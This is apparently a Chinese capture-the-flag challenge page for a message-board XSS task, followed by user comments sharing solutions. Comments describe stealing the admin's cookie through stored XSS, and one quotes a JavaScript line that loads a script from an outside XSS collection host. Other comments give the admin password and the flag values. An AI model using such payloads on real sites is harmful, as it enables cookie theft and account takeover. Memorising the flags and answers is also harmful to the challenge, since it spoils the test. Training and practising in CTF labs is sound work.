留言板WEB 未解决
分数:
10
金币:
3
题目作者:
harry
一 血:
꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励:
5金币
解 决:
2299
提 示:
题目无需登录后台!需要xss平台接收flag
描 述:
http协议需要http协议的xss平台
评论
几度夕阳红 1年前
举报
我认为的正常思路:1、在留言板插入XSS代码 2、管理员观看留言,触发XSS代码 3、XSS平台接收到管理员cookie信息,这里的cookie就是flag。但是不知道靶场是否实现了管理员触发XSS的机制,XSS平台一直未接收到信息。大家伙的解法,使用工具扫描网站,发现admin.php,和你大概率扫不到的db.sql文件,db.sql有admin的账号密码。登录admin界面,会触发你写入的XS
Robuntu 8月前
举报
@harry 大佬,我用的xss平台一直没有收到信息,请问是payload的问题吗
harry 管理员 1年前
举报
已经实现了管理员触发XSS的机制
星之队队大队长 1年前
举报
先输入payload 然后 admin.php user: admin password: 011be4d65feac1a8 登录即可
问题小子 1年前
举报
纯小白,这道题怎么做啊
xcxy 1年前
举报
用御剑工具扫描不出文件目录,直接xss平台代码插入就行了,也不用变形,能够收到cookie : flag=flag%7B5b10e075f4319e7f628f6813ca4a1904%7D,这个是url编码,解码就行了。题目应该是改了,太简单了
32130262 1年前
举报
我用xss.pt生成的脚本,放入留言框里,换了很多格式。还使用F12 console 里输入javascript:eval('window.s=document.createElement("script");window.s.src="https://0x.ax/o0fK";document.body.appendChild(window.s)'),xss
Wjustice 1年前
举报
复盘一下,直接上工具得出后台路径,然后插入图片xss,导出flag,估计是改了题,以前应该是还有个dp.sql文件。。。。。
Amibaba 1年前
举报
/admin.php登录后台,账号admin 密码 011be4d65feac1a8,控制台打cookie,alert(document.cookie)
Cmy520CTF 1年前
举报
链接后面加 /admin.php回车 账号admin 密码 011be4d65feac1a8 然后点击login得到 flag=flag%7Bce56da59371f9eec3569e6feca58eeff%7D 转成 flag{ce56da59371f9eec3569e6feca58eeff}就是答案
嵌入式学的CTF 1年前
举报
题改了,不需要后台也扫不到后台,只有一个管理员且无法注入,只能灵活XSS,而且服务器很慢耐心等待,我一直以为没反应改了半天pd
sisa 1年前
举报
dirmap、dirsearch、dirb都扫不出sql文件,看wp直接访问db.sql得到是The requested URL was not found on this server.真不知你们是怎么知道密码的?